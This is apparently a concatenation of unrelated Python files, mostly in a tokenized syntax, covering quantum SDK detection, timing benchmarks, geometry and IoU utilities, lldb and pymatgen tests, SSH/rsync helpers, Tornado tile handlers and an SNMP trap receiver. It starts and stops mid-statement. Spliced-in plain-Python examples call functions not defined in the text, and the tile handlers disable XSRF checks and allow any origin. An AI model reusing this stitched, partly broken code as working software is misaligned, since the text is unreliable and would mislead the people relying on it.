prefix+"quilc")<line_sep>is_forest=<true><block_end><except_stmt>FileNotFoundError<block_start>is_forest=<false><block_end><block_end><block_end><except_stmt>ImportError<block_start>is_forest=<false><block_end><try_stmt><block_start><import_stmt>qiskit<import_stmt>qiskit.aqua<import_from_stmt>qiskit QuantumCircuit ClassicalRegister QuantumRegister<import_from_stmt>qiskit execute<try_stmt><block_start><import_from_stmt>qiskit Aer<block_end><except_stmt>ImportError<block_start><import_from_stmt>qiskit BasicAer<as>Aer<block_end><import_from_stmt>qiskit.quantum_info Pauli<import_from_stmt>qiskit.aqua.operators *<line_sep>is_qiskit=<true><block_end><except_stmt>ImportError<block_start>is_qiskit=<false><block_end><try_stmt><block_start><import_stmt>dimod<import_stmt>dwave_networkx<import_stmt>minorminer<line_sep>is_dwave=<true><block_end><except_stmt>ImportError<block_start>is_dwave=<false><block_end><if_stmt><not>(is_qiskit<or>is_forest)<block_start><raise>RuntimeError("No quantum computing framework available!")<block_end><if_stmt><not>is_dwave<block_start><raise>RuntimeError("D-Wave Ocean is not available!")<block_end>print("Available frameworks:")<if_stmt>is_forest<block_start>print("Forest SDK")<block_end><if_stmt>is_qiskit<block_start>print("Qiskit")<block_end><if_stmt>is_dwave<block_start>print("D-Wave Ocean")<block_end><block_end>
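# Illustrative example (assumes the Qiskit branch above is available): get_counts()
# dispatches on the circuit type, so a plain Qiskit circuit can be passed directly.
if __name__ == "__main__" and is_qiskit:
    bell = QuantumCircuit(2, 2)
    bell.h(0)
    bell.cx(0, 1)
    bell.measure([0, 1], [0, 1])
    print(get_counts(bell, num_shots=100))   # roughly {'00': ~50, '11': ~50}
    print(get_classical_bits(bell))          # 2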
<import_stmt>time<import_from_stmt>functools partial<import_stmt>torch<def_stmt>timer fxn max_time=5<block_start>N=0<line_sep>total_time=0<line_sep>fxn()<while_stmt>total_time<l>max_time<block_start>start=time.perf_counter()<line_sep>fxn()<line_sep>total_time<augadd>time.perf_counter()-start<line_sep>N<augadd>1<block_end><return>total_time/N<block_end><def_stmt>task A target<block_start>result=0<line_sep>i=0<line_sep>N=0<while_stmt>result<l>target<block_start>r=A[i]<line_sep>result<augadd>r<line_sep>i=A[i]<line_sep>N<augadd>1<block_end><return>N<block_end><if_stmt>__name__<eq>"__main__"<block_start>N=1000<line_sep>print(f"Testing with array of length {N}")<line_sep>A_py=(torch.rand(N)<times>N).type(torch.int).to("cuda:0")<line_sep>A_np=A_py.cpu().numpy()<line_sep>t_py=timer(partial(task A_py 500))<line_sep>t_np=timer(partial(task A_np 500))<line_sep>print(f"PyTorch took: {t_py:0.3e}s")<line_sep>print(f"Numpy took: {t_np:0.3e}s")<line_sep>print(f"Numpy is {100-t_np/t_py<times>100:0.2f}% faster")<block_end>

# # tests/utils # """ Useful functions for all tests """<import_stmt>asyncio<import_stmt>pytest<import_from_stmt>growler.aio.http_protocol GrowlerHTTPProtocol<import_stmt>growler<def_stmt>random_port <block_start><import_from_stmt>random randint<line_sep><return>randint(1024 2<power>16)<block_end>@asyncio.coroutine<def_stmt>setup_test_server unused_tcp_port event_loop<block_start>""" Sets up a GrowlerProtocol server for testing """<line_sep># proto = growler.protocol.GrowlerProtocol proto=TestProtocol<line_sep>server=<yield><from>event_loop.create_server(proto '127.0.0.1' unused_tcp_port)<line_sep><return>server unused_tcp_port<block_end>@asyncio.coroutine<def_stmt>setup_http_server loop port<block_start>""" Sets up a GrowlerHTTPProtocol server for testing """<line_sep># proto = growler.protocol.GrowlerHTTPProtocol app=growler.App()<def_stmt>proto <block_start><return>GrowlerHTTPProtocol(app)<block_end><return>(<yield><from>loop.create_server(proto '127.0.0.1' port))<block_end><def_stmt>teardown_server server loop=asyncio.get_event_loop()<block_start>""" 'Generic' tear down a server and wait on the loop for everything to close. """<line_sep>server.close()<line_sep>loop.run_until_complete(server.wait_closed())<block_end>
<class_stmt>ObjectMaterialSource(Enum IComparable IFormattable IConvertible)<block_start>""" Defines enumerated values for the source of material of single objects. enum ObjectMaterialSource,values: MaterialFromLayer (0),MaterialFromObject (1),MaterialFromParent (3) """<def_stmt>__eq__ self *args<block_start>""" x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """<line_sep><pass><block_end><def_stmt>__format__ self *args<block_start>""" __format__(formattable: IFormattable,format: str) -> str """<line_sep><pass><block_end><def_stmt>__ge__ self *args<block_start><pass><block_end><def_stmt>__gt__ self *args<block_start><pass><block_end><def_stmt>__init__ self *args<block_start>""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """<line_sep><pass><block_end><def_stmt>__le__ self *args<block_start><pass><block_end><def_stmt>__lt__ self *args<block_start><pass><block_end><def_stmt>__ne__ self *args<block_start><pass><block_end><def_stmt>__reduce_ex__ self *args<block_start><pass><block_end><def_stmt>__str__ self *args<block_start><pass><block_end>MaterialFromLayer=<none><line_sep>MaterialFromObject=<none><line_sep>MaterialFromParent=<none><line_sep>value__=<none><block_end>
<import_stmt>FWCore.ParameterSet.Config<as>cms<import_from_stmt>RecoLocalMuon.GEMRecHit.gemRecHits_cfi *<import_from_stmt>RecoLocalMuon.GEMSegment.gemSegments_cfi *<line_sep>gemLocalRecoTask=cms.Task(gemRecHits gemSegments)<line_sep>gemLocalReco=cms.Sequence(gemLocalRecoTask)<line_sep>
""" Filename: cartesian.py Authors: <NAME> Implements cartesian products and regular cartesian grids. """<import_stmt>numpy<import_from_stmt>numba njit<def_stmt>cartesian nodes order="C"<block_start>"""Cartesian product of a list of arrays Parameters: ----------- nodes: (list of 1d-arrays) order: ('C' or 'F') order in which the product is enumerated Returns: -------- out: (2d-array) each line corresponds to one point of the product space """<line_sep>nodes=[numpy.array(e)<for>e nodes]<line_sep>shapes=[e.shape[0]<for>e nodes]<line_sep>n=len(nodes)<line_sep>l=numpy.prod(shapes)<line_sep>out=numpy.zeros((l n))<if_stmt>order<eq>"C"<block_start>repetitions=numpy.cumprod([1]+shapes[:-1])<block_end><else_stmt><block_start>shapes.reverse()<line_sep>sh=[1]+shapes[:-1]<line_sep>repetitions=numpy.cumprod(sh)<line_sep>repetitions=repetitions.tolist()<line_sep>repetitions.reverse()<block_end><for_stmt>i range(n)<block_start>_repeat_1d(nodes[i] repetitions[i] out[: i])<block_end><return>out<block_end><def_stmt>mlinspace a b nums order="C"<block_start>"""Constructs a regular cartesian grid Parameters: ----------- a: (1d-array) lower bounds in each dimension b: (1d-array) upper bounds in each dimension nums: (1d-array) number of nodes along each dimension order: ('C' or 'F') order in which the product is enumerated Returns: -------- out: (2d-array) each line corresponds to one point of the product space """<line_sep>a=numpy.array(a dtype="float64")<line_sep>b=numpy.array(b dtype="float64")<line_sep>nums=numpy.array(nums dtype="int64")<line_sep>nodes=[numpy.linspace(a[i] b[i] nums[i])<for>i range(len(nums))]<line_sep><return>cartesian(nodes order=order)<block_end>@njit(cache=<true>)<def_stmt>_repeat_1d x K out<block_start>"""Repeats each element of a vector many times and repeats the whole result many times Parameters ---------- x: (1d array) vector to be repeated K: (int) number of times each element of x is repeated (inner iterations) out: (1d array) placeholder for the result Returns ------- None """<line_sep>N=x.shape[0]<line_sep>L=out.shape[0]<floordiv>(K<times>N)# number of outer iterations # K # number of inner iterations # the result out should enumerate in C-order the elements # of a 3-dimensional array T of dimensions (K,N,L) # such that for all k,n,l, we have T[k,n,l] == x[n] <for_stmt>n range(N)<block_start>val=x[n]<for_stmt>k range(K)<block_start><for_stmt>l range(L)<block_start>ind=k<times>N<times>L+n<times>L+l<line_sep>out[ind]=val<block_end><block_end><block_end><block_end>
# -*- coding: utf-8 -*- <import_from_future_stmt> absolute_import<import_from_future_stmt> division<import_from_future_stmt> print_function<import_stmt>tensorflow<as>tf<def_stmt>iou_calculate boxes_1 boxes_2<block_start>''' :param boxes_1: [N, 4] [ymin, xmin, ymax, xmax] :param boxes_2: [M, 4] [ymin, xmin, ymax, xmax] :return: [N, M] IoU between every box in boxes_1 and every box in boxes_2 '''<with_stmt>tf.name_scope('iou_calculate')<block_start>ymin_1,xmin_1,ymax_1,xmax_1=tf.split(boxes_1 4 axis=1)# ymin_1 shape is [N, 1].. ymin_2,xmin_2,ymax_2,xmax_2=tf.unstack(boxes_2 axis=1)# ymin_2 shape is [M, ].. max_xmin=tf.maximum(xmin_1 xmin_2)<line_sep>min_xmax=tf.minimum(xmax_1 xmax_2)<line_sep>max_ymin=tf.maximum(ymin_1 ymin_2)<line_sep>min_ymax=tf.minimum(ymax_1 ymax_2)<line_sep>overlap_h=tf.maximum(0. min_ymax-max_ymin)# avoid h < 0 overlap_w=tf.maximum(0. min_xmax-max_xmin)<line_sep>overlaps=overlap_h<times>overlap_w<line_sep>area_1=(xmax_1-xmin_1)<times>(ymax_1-ymin_1)# [N, 1] area_2=(xmax_2-xmin_2)<times>(ymax_2-ymin_2)# [M, ] iou=overlaps/(area_1+area_2-overlaps)<line_sep><return>iou<block_end><block_end>
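# Worked example (added illustration, assuming TF 2.x eager execution; under TF 1.x the
# returned tensor would need to be evaluated in a session). Boxes (0,0,2,2) and (1,1,3,3)
# overlap in a 1x1 square and each has area 4, so IoU = 1 / (4 + 4 - 1) = 1/7.
if __name__ == '__main__':
    boxes_1 = tf.constant([[0., 0., 2., 2.]])
    boxes_2 = tf.constant([[1., 1., 3., 3.]])
    print(iou_calculate(boxes_1, boxes_2))   # ~[[0.1429]]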
# Copyright (c) 2010 Resolver Systems Ltd, PythonAnywhere LLP # See LICENSE.md # <import_from_stmt>threading Lock<import_from_stmt>.errors report_cell_error CycleError<class_stmt>Node(object)<block_start><def_stmt>__init__ self location children=<none> parents=<none><block_start>self.location=location<line_sep>self.children=children<if>children<else>set()<line_sep>self.parents=parents<if>parents<else>set()<line_sep>self.lock=Lock()<block_end><def_stmt>__eq__ self other<block_start><return>(self.location<eq>other.location<and>self.children<eq>other.children<and>self.parents<eq>other.parents)<block_end><def_stmt>__ne__ self other<block_start><return><not>self.__eq__(other)<block_end><def_stmt>__repr__ self<block_start><return>"<Node %d,%d children={%s} parents={%s}>"%(self.location[0] self.location[1] ', '.join(str(i)<for>i self.children) ', '.join(str(i)<for>i self.parents))<block_end><def_stmt>remove_from_parents self parent_nodes leaf_queue<block_start><for_stmt>parent parent_nodes<block_start>parent.lock.acquire()<line_sep>parent.children.remove(self.location)<if_stmt>len(parent.children)<eq>0<block_start>leaf_queue.put(parent.location)<block_end>parent.lock.release()<block_end><block_end><block_end><def_stmt>build_dependency_graph worksheet<block_start>graph={}<line_sep>visited=set()<for_stmt>loc worksheet.keys()<block_start><try_stmt><block_start>_generate_cell_subgraph(worksheet graph loc visited [])<block_end><except_stmt>CycleError<block_start><pass><block_end><block_end># Deal with escapees leaves=[]<for_stmt>loc,deps graph.iteritems()<block_start><if_stmt><not>deps.children<block_start>leaves.append(loc)<block_end><block_end><return>graph leaves<block_end><def_stmt>_generate_cell_subgraph worksheet graph loc completed path<block_start><if_stmt>loc<not><in>worksheet<block_start><return><block_end>cell=worksheet[loc]<if_stmt>loc<in>completed<block_start><if_stmt>type(cell.error)<eq>CycleError<block_start><raise>cell.error<block_end><else_stmt><block_start><return><block_end><block_end><if_stmt>loc<in>path<block_start>cycle_error=CycleError(path[path.index(loc):]+[loc])<line_sep>report_cell_error(worksheet loc cycle_error)<line_sep>completed.add(loc)<line_sep><raise>cycle_error<block_end><if_stmt>cell.python_formula<block_start>valid_dependencies=set()<for_stmt>dep_loc cell.dependencies<block_start>dep_cell=worksheet[dep_loc]<try_stmt><block_start>_generate_cell_subgraph(worksheet graph dep_loc completed path+[loc])<if_stmt>dep_cell.error<block_start><continue><block_end><if_stmt><not>dep_cell.python_formula<block_start><continue><block_end>valid_dependencies.add(dep_loc)<block_end><except_stmt>CycleError<as>cycle_error<block_start><if_stmt><not>loc<in>completed<block_start>report_cell_error(worksheet loc cycle_error)<block_end><if_stmt>loc<in>cycle_error.path<block_start>completed.add(loc)<line_sep><raise>cycle_error<block_end><block_end><block_end>_add_location_dependencies(graph loc valid_dependencies)<block_end>completed.add(loc)<block_end><def_stmt>_add_location_dependencies graph location dependencies<block_start><if_stmt>location<not><in>graph<block_start>graph[location]=Node(location)<block_end>graph[location].children<augor>dependencies<for_stmt>dependency dependencies<block_start><if_stmt>dependency<not><in>graph<block_start>graph[dependency]=Node(dependency)<block_end>graph[dependency].parents.add(location)<block_end><block_end>
<import_stmt>requests<def_stmt>getrev <block_start>resp=requests.get("https://pypi.org/pypi/TwitchIO/json")<line_sep>data=resp.json()["releases"]<line_sep>pre=max(data).split("b")<line_sep>final=f"{pre[0]}b{int(pre[1])+1}"<line_sep><return>final<block_end>print(getrev())<line_sep>
"""Test that forward declaration of a data structure gets resolved correctly."""<import_from_future_stmt> print_function<import_stmt>os<import_stmt>time<import_stmt>lldb<import_from_stmt>lldbsuite.test.lldbtest *<import_stmt>lldbsuite.test.lldbutil<as>lldbutil<class_stmt>ForwardDeclarationTestCase(TestBase)<block_start>mydir=TestBase.compute_mydir(__file__)<def_stmt>test_and_run_command self<block_start>"""Display *bar_ptr when stopped on a function with forward declaration of struct bar."""<line_sep>self.build()<line_sep>exe=os.path.join(os.getcwd() "a.out")<line_sep>self.runCmd("file "+exe CURRENT_EXECUTABLE_SET)<line_sep># Break inside the foo function which takes a bar_ptr argument. lldbutil.run_break_set_by_symbol(self "foo" num_expected_locations=1 sym_exact=<true>)<line_sep>self.runCmd("run" RUN_SUCCEEDED)<line_sep># The stop reason of the thread should be breakpoint. self.expect("thread list" STOPPED_DUE_TO_BREAKPOINT substrs=['stopped' 'stop reason = breakpoint'])<line_sep># The breakpoint should have a hit count of 1. self.expect("breakpoint list -f" BREAKPOINT_HIT_ONCE substrs=[' resolved, hit count = 1'])<line_sep># This should display correctly. # Note that the member fields of a = 1 and b = 2 is by design. self.expect("frame variable --show-types *bar_ptr" VARIABLES_DISPLAYED_CORRECTLY substrs=['(bar) *bar_ptr = ' '(int) a = 1' '(int) b = 2'])<line_sep># And so should this. self.expect("expression --show-types -- *bar_ptr" VARIABLES_DISPLAYED_CORRECTLY substrs=['(bar)' '(int) a = 1' '(int) b = 2'])<block_end><block_end>
# coding: utf-8 """ This module contains all the paths for alls this project's directories, that we created dynamically. All paths are absolute, without symlink and in unicode. We also add the 'apps' and 'libs' directories to the PYTHON PATH, which will make the imports much easier. """<import_stmt>sys<import_stmt>os<import_stmt>tempfile<import_from_stmt>pathlib Path<line_sep># This part is a bit complicated and is not mandatory for your project, but # it renders it completely portable since all directory paths are dynamically # generated instead of being hard coded. # We get the 'settings.py' file path (the __FILE__ variable contains # automatically the path of the current file) and we transform this string # to unicode in case you got non ASCII characters in this name ( # sys.getfilesystemencoding() get us the file system encoding which can be # different for Windows, Mac or Linux) THIS_FILE=Path(__file__)<line_sep># We dynamically create these settings, giving us the absolute path # to the project directory, the root directory containing all our work # and any other directory we might need PROJECT_DIR=THIS_FILE.absolute().resolve()<line_sep>BASE_DIR=PROJECT_DIR.parent.parent<line_sep>APPS_DIR=BASE_DIR/'apps'<line_sep>LIBS_DIR=BASE_DIR/'ignore_this_directory'<line_sep>TEMP_DIR=Path(tempfile.gettempdir())<line_sep># We add the apps and libs directory to the PYTHON PATH, so we can import each # package without prefixing them with the parent package name. This mimic the # behavior we would have if they were at the root directory or installed with # pip. # # E.G: we can do from "app1_hello.views import hello" instead of # "from apps.app1_hello.views import hello" or "import django" instead of # "from libs import django" # # When you have a small project, you can avoid this and put all apps at the root # dir like in the official Django tutorial, but in a big project with a lots of # apps, you usually put them all in an "apps" dir like we did, so it's a good # thing to know. sys.path.append(str(LIBS_DIR))<line_sep>sys.path.append(str(APPS_DIR))<line_sep>
<import_from_future_stmt> print_function<import_stmt>os<import_from_stmt>ConfigParser NoSectionError NoOptionError<import_stmt>paramiko<import_from_stmt>artemis.config get_artemis_config_value<import_from_stmt>artemis.fileman.config_files get_config_value<import_from_stmt>artemis.remote.utils get_ssh_connection<def_stmt>check_config_file ip_address file_path=".artemisrc"<block_start>''' Makes sure all required fields are present in ~./artemisrc. Also performs test for the different options if applicable :param ip_address: The section to look for. Remote ip is assumed. Makes no sense for local ip. :return: '''<line_sep>mandatory_options=["username" "python"]<line_sep>artemisrc_path=os.path.expanduser("~/%s"%file_path)<for_stmt>option mandatory_options<block_start><try_stmt><block_start>get_artemis_config_value(section=ip_address option=option)<block_end><except_stmt>NoSectionError<block_start>print("Section %s could not be found in %s. Please provide it."%(ip_address artemisrc_path))<line_sep><raise><block_end><except_stmt>NoOptionError<block_start>print("Section %s does not contain option %s. Please provide it in %s"%(ip_address option artemisrc_path))<line_sep><raise><block_end><block_end># optional_options = ["private_key"] <try_stmt><block_start>private_key_path=get_artemis_config_value(section=ip_address option="private_key")<assert_stmt>os.path.isfile(private_key_path) "The path to the private_key for %s you specified in %s is not valid. You provided %s"%(ip_address artemisrc_path private_key_path)<block_end><except_stmt>NoOptionError<block_start><pass><block_end># username & private key setup tests: <try_stmt><block_start>get_ssh_connection(ip_address)<block_end><except_stmt>paramiko.ssh_exception.AuthenticationException<as>e<block_start><if_stmt>"Authentication failed"<in>e.message<block_start>print("An AuthenticationException is being raised. Make sure you have your private key set up correctly")<block_end><else_stmt><block_start>print("An AuthenticationException is being raised. Did you specify the correct username for %s in %s? You provided the username %s"%(ip_address artemisrc_path get_artemis_config_value(section=ip_address option="username")))<block_end><raise><block_end><except_stmt>paramiko.ssh_exception.SSHException<block_start><try_stmt><block_start>private_key_path=get_artemis_config_value(section=ip_address option="private_key")<line_sep>print("Something is wrong with the private_key you specified in %s for %s . You provided %s"%(artemisrc_path ip_address private_key_path))<line_sep><raise><block_end><except_stmt>NoOptionError<block_start>private_key_path=os.path.join(os.path.expanduser("~") ".ssh/id_rsa")<line_sep>print("You did not provide a private_key path in %s. The default path %s appears to be wrongly set up. "<concat>"Please make sure you have correctly set up your private key for %s "%(artemisrc_path private_key_path ip_address))<block_end><block_end>#python tests: python_path=get_artemis_config_value(section=ip_address option="python")<line_sep>command="python -c 'import os; print(os.path.isfile(os.path.expanduser(\"%s\")))'"%python_path<line_sep>ssh_conn=get_ssh_connection(ip_address)<line_sep>_,stdout,stderr=ssh_conn.exec_command(command)<assert_stmt>stdout.read().strip()<eq>"True" "The provided path to the remote python installation on %s does not exist. 
You provided %s"%(ip_address python_path)<line_sep>command="%s -c 'print(\"Success\")'"%python_path<line_sep>_,stdout,stderr=ssh_conn.exec_command(command)<line_sep>err=stderr.read().strip()<assert_stmt>stdout.read().strip()<eq>"Success"<and><not>err "The provided python path on %s does not seem to point to a python executable. "<concat>"You provided %s, which resulted in the following error on the remote machine: "%(ip_address python_path err)<block_end><def_stmt>simple_rsync local_path remote_path ip_address verbose=<false><block_start>''' This method synchronizes local_path and all subfolders with remote_path at the given address. This method executes a system rsync call. This is not a general wrapper for rsync. The call is blocking. :param local_path: :param remote_path: Assumed to be relative to the home dir :param ip_address: :return: '''<line_sep>options="-ah"<if_stmt>verbose<block_start>options<augadd>"v"<block_end>local_path=os.path.expanduser(local_path)<line_sep>username=get_artemis_config_value(section=ip_address option="username")<if_stmt>remote_path.startswith("~")<block_start>remote_path=remote_path[1:]<block_end><if_stmt>remote_path.startswith(("/"))<block_start>remote_path=remote_path[1:]<block_end># to_path = "%s@%s:/home/%s/%s" % (username, address, username, remote_path) to_path="%s@%s:~/%s"%(username ip_address remote_path)<line_sep><return>rsync(options from_path=local_path to_path=to_path)<block_end><def_stmt>rsync options from_path to_path<block_start>''' basic rsync wrapper :param options: :param from_path: :param to_path: :return: '''<import_stmt>subprocess<line_sep>print("Starting: rsync %s %s %s"%(options from_path to_path))<if_stmt><not>type(options)<is>list<block_start>options=[options]<block_end>command=subprocess.Popen(["rsync"]+options+[from_path to_path] stdout=subprocess.PIPE stderr=subprocess.PIPE bufsize=1)<if_stmt>"v"<in>options<block_start><while_stmt><true><block_start>line=command.stdout.readline()<if_stmt>line<ne>''<block_start>print(line.rstrip())<block_end><else_stmt><block_start><break><block_end><block_end><block_end>err=command.stderr.read().strip()<if_stmt>err<block_start>msg="rsync received messages on stderr. This might indicate that the command failed or, if you transferred to a remote server,"<concat>" it might just be some message received by the remote server. \n"<concat>"This is because rsync automatically forwards all messages by the remote server to stderr. \n"<concat>"If you are confident that the call succeeded although stderr received messages, then catch the RuntimeError accordingly.\n "<concat>"The messages received are: \n %s"%err<line_sep><raise>RuntimeError(msg)<block_end>print("rsync finished")<line_sep><return><true><block_end>
<import_stmt>os<import_stmt>unittest<import_stmt>warnings<import_from_stmt>pymatgen.analysis.solar.slme optics slme<import_from_stmt>pymatgen.util.testing PymatgenTest<class_stmt>SolarTest(PymatgenTest)<block_start>_multiprocess_shared_=<true><def_stmt>setUp self<block_start>warnings.simplefilter("ignore")<block_end><def_stmt>tearDown self<block_start>warnings.simplefilter("default")<block_end><def_stmt>test_slme_from_vasprun self<block_start>path=os.path.join(os.path.dirname(__file__) "vasprun.xml")<line_sep>en,abz,dirgap,indirgap=optics(path)<line_sep>abz=abz<times>100.0<line_sep>eff=slme(en abz indirgap indirgap plot_current_voltage=<false>)<line_sep>self.assertAlmostEqual(eff 27.728998512472298 places=5)<block_end><block_end><if_stmt>__name__<eq>"__main__"<block_start>unittest.main()<block_end>
""" All the functions to manipulate the resource fields, state changes, etc. Grouped by the type of the fields and the purpose of the manipulation. Used in the handling routines to check if there were significant changes at all (i.e. not our own internal and system changes, like the uids, links, etc), and to get the exact per-field diffs for the specific handler functions. All the functions are purely data-manipulative and computational. No external calls or any i/o activities are done here. """<line_sep>
<import_stmt>unittest<import_stmt>os<import_stmt>sys<if_stmt>os.environ.get('USELIB')<ne>'1'<block_start>sys.path.insert(0 os.path.join(os.path.dirname(__file__) '..'))<block_end><import_from_stmt>pyleri KeywordError create_grammar Tokens <line_sep># nopep8 <class_stmt>TestTokens(unittest.TestCase)<block_start><def_stmt>test_tokens self<block_start>spaced='== != >= <= > <'<line_sep>tokens=Tokens('== > != < >= <= ')<line_sep>grammar=create_grammar(tokens)<line_sep>self.assertEqual(spaced str(tokens))<line_sep>self.assertTrue(grammar.parse('==').is_valid)<line_sep>self.assertTrue(grammar.parse('<=').is_valid)<line_sep>self.assertTrue(grammar.parse('>').is_valid)<line_sep>self.assertFalse(grammar.parse('').is_valid)<line_sep>self.assertFalse(grammar.parse('=').is_valid)<line_sep>self.assertEqual(str(grammar.parse('')) 'error at position 0, expecting: == != >= <= > <')<block_end><block_end><if_stmt>__name__<eq>'__main__'<block_start>unittest.main()<block_end>
<import_from_stmt>concurrent.futures ThreadPoolExecutor<import_from_stmt>datetime datetime timedelta<import_stmt>json<import_from_stmt>ModestMaps.Core Coordinate<import_from_stmt>notebook.base.handlers IPythonHandler<import_from_stmt>tornado concurrent ioloop<import_from_stmt>tornado gen<import_from_stmt>tornado web<import_from_stmt>.utils serialize_config serialize_layer<class_stmt>KTileAsyncClient(object)<block_start>__instance=<none><def_stmt>__new__ cls *args **kwargs<block_start><if_stmt>cls.__instance<is><none><block_start>cls.__instance=super(KTileAsyncClient cls).__new__(cls *args **kwargs)<block_end><return>cls.__instance<block_end><def_stmt>__init__ self<block_start>self.executor=ThreadPoolExecutor(max_workers=4)<line_sep>self.io_loop=ioloop.IOLoop.current()<block_end>@concurrent.run_on_executor<def_stmt>getTileResponse self layer coord extension<block_start><return>layer.getTileResponse(coord extension)<block_end><block_end><class_stmt>KtileHandler(IPythonHandler)<block_start><def_stmt>check_xsrf_cookie self# TODO: Find a way to correctly communicate XSRF secret to # the kernel so ingest requests can be properly authenticated <block_start><pass><block_end><def_stmt>initialize self ktile_config_manager<block_start>self.ktile_config_manager=ktile_config_manager<try_stmt><block_start><if_stmt>self.request.headers["Content-Type"].lower().startswith("application/json")<block_start><try_stmt><block_start>body=self.request.body.decode('utf-8')<block_end><except_stmt>AttributeError<block_start>body=self.request.body<block_end>self.request.json=json.loads(body)<block_end><block_end><except_stmt>Exception<block_start>self.request.json=<none><block_end><block_end><def_stmt>post self kernel_id# Note: needs parameter validation <block_start>kwargs={}<if>self.request.json<is><none><else>self.request.json<line_sep>self.ktile_config_manager.add_config(kernel_id **kwargs)<line_sep>self.log.info("Created config for {}".format(kernel_id))<line_sep>self.finish()<block_end><def_stmt>delete self kernel_id<block_start><try_stmt><block_start><del_stmt>self.ktile_config_manager[kernel_id]<block_end><except_stmt>KeyError<block_start><raise>web.HTTPError(404 u'Kernel %s not found'%kernel_id)<block_end><block_end><def_stmt>get self kernel_id **kwargs<block_start><try_stmt><block_start>config=self.ktile_config_manager[kernel_id]<block_end><except_stmt>KeyError<block_start><raise>web.HTTPError(404 u'Kernel %s not found'%kernel_id)<block_end>self.finish(serialize_config(config))<block_end><block_end><class_stmt>KtileLayerHandler(IPythonHandler)<block_start><def_stmt>check_xsrf_cookie self# TODO: Find a way to correctly communicate XSRF secret to # the kernel so ingest requests can be properly authenticated <block_start><pass><block_end><def_stmt>initialize self ktile_config_manager<block_start>self.ktile_config_manager=ktile_config_manager<block_end><def_stmt>prepare self<block_start><try_stmt><block_start><if_stmt>self.request.headers["Content-Type"].lower().startswith("application/json")<block_start><try_stmt><block_start>body=self.request.body.decode('utf-8')<block_end><except_stmt>AttributeError<block_start>body=self.request.body<block_end>self.request.json=json.loads(body)<block_end><block_end><except_stmt>Exception<block_start>self.request.json=<none><block_end><block_end><def_stmt>post self kernel_id layer_name# Note: needs parameter validation <block_start><try_stmt><block_start>self.ktile_config_manager.add_layer(kernel_id layer_name 
self.request.json)<line_sep>self.finish()<block_end><except_stmt>Exception<block_start><import_stmt>sys<import_stmt>traceback<line_sep>t,v,tb=sys.exc_info()<line_sep>self.log.error(''.join(traceback.format_exception(t v tb)))<line_sep>self.clear()<line_sep>self.set_status(500)<line_sep>self.finish({'error':traceback.format_exception(t v tb)})<block_end><block_end><def_stmt>get self kernel_id layer_name **kwargs<block_start><try_stmt><block_start>config=self.ktile_config_manager[kernel_id]<block_end><except_stmt>KeyError<block_start><raise>web.HTTPError(400 u'Kernel %s not found'%kernel_id)<block_end><try_stmt><block_start>layer=config.layers[layer_name]<block_end><except_stmt>KeyError<block_start><raise>web.HTTPError(404 u'Layer %s not found'%layer_name)<block_end>self.finish(serialize_layer(layer))<block_end><block_end><class_stmt>KtileTileHandler(IPythonHandler)<block_start><def_stmt>initialize self ktile_config_manager<block_start>self.client=KTileAsyncClient()<line_sep>self.ktile_config_manager=ktile_config_manager<block_end>@gen.coroutine<def_stmt>get self kernel_id layer_name x y z extension **kwargs<block_start>config=self.ktile_config_manager[kernel_id]<line_sep>layer=config.layers[layer_name]<line_sep>coord=Coordinate(int(y) int(x) int(z))<line_sep># To run synchronously: # status_code, headers, content = layer.getTileResponse( # coord, extension) status_code,headers,content=<yield>self.client.getTileResponse(layer coord extension)<if_stmt>layer.max_cache_age<is><not><none><block_start>expires=datetime.utcnow()+timedelta(seconds=layer.max_cache_age)<line_sep>headers['Expires']=expires.strftime('%a %d %b %Y %H:%M:%S GMT')<line_sep>headers['Cache-Control']='public, max-age=%d'%layer.max_cache_age<block_end><else_stmt><block_start>headers['Cache-Control']='no-cache, no-store, must-revalidate'<line_sep>headers['Pragma']='no-cache'<line_sep>headers['Expires']='0'<block_end># Force allow cross origin access headers["Access-Control-Allow-Origin"]="*"<line_sep># Fill tornado handler properties with ktile code/header/content <for_stmt>k,v headers.items()<block_start>self.set_header(k v)<block_end>self.set_status(status_code)<line_sep>self.write(content)<block_end><block_end>
''' Created on Nov. 06, 2014 @author: yunli '''<import_from_stmt>pysnmp.carrier.asynsock.dispatch AsynsockDispatcher<import_from_stmt>pysnmp.carrier.asynsock.dgram udp<import_from_stmt>pyasn1.codec.ber decoder<import_from_stmt>pysnmp.proto api<import_from_stmt>threading Thread Event<import_stmt>logging<import_stmt>util<import_stmt>signal<import_stmt>sys<import_stmt>subprocess<import_stmt>concurrent.futures<import_from_stmt>devicePlugin TwoStageConfigurator<import_from_stmt>propLoader OpenClosProperty loadLoggingConfig<import_from_stmt>exception TrapDaemonError<line_sep>moduleName='trapd'<line_sep>loadLoggingConfig(appName=moduleName)<line_sep>logger=logging.getLogger(moduleName)<line_sep>DEFAULT_HOST="0.0.0.0"<line_sep>DEFAULT_PORT=20162<line_sep>DEFAULT_MAX_THREADS=10<line_sep>trapReceiver=<none><def_stmt>onTrap transportDispatcher transportDomain transportAddress wholeMsg# don't even log the trap PDU unless we are at DEBUG level <block_start><if_stmt>logger.isEnabledFor(logging.DEBUG)<block_start><while_stmt>wholeMsg<block_start>msgVer=int(api.decodeMessageVersion(wholeMsg))<if_stmt>msgVer<in>api.protoModules<block_start>pMod=api.protoModules[msgVer]<block_end><else_stmt><block_start>logger.error('Unsupported SNMP version %s'%msgVer)<line_sep><return><block_end>reqMsg,wholeMsg=decoder.decode(wholeMsg asn1Spec=pMod.Message() )<line_sep>logger.info('Notification message from %s:%s '%(transportAddress[0] transportAddress[1]))<line_sep>reqPDU=pMod.apiMessage.getPDU(reqMsg)<if_stmt>reqPDU.isSameTypeWith(pMod.TrapPDU())<block_start><if_stmt>msgVer<eq>api.protoVersion1<block_start>logger.debug('Enterprise: %s'%(pMod.apiTrapPDU.getEnterprise(reqPDU).prettyPrint()))<line_sep>logger.debug('Agent Address: %s'%(pMod.apiTrapPDU.getAgentAddr(reqPDU).prettyPrint()))<line_sep>logger.debug('Generic Trap: %s'%(pMod.apiTrapPDU.getGenericTrap(reqPDU).prettyPrint()))<line_sep>logger.debug('Specific Trap: %s'%(pMod.apiTrapPDU.getSpecificTrap(reqPDU).prettyPrint()))<line_sep>logger.debug('Uptime: 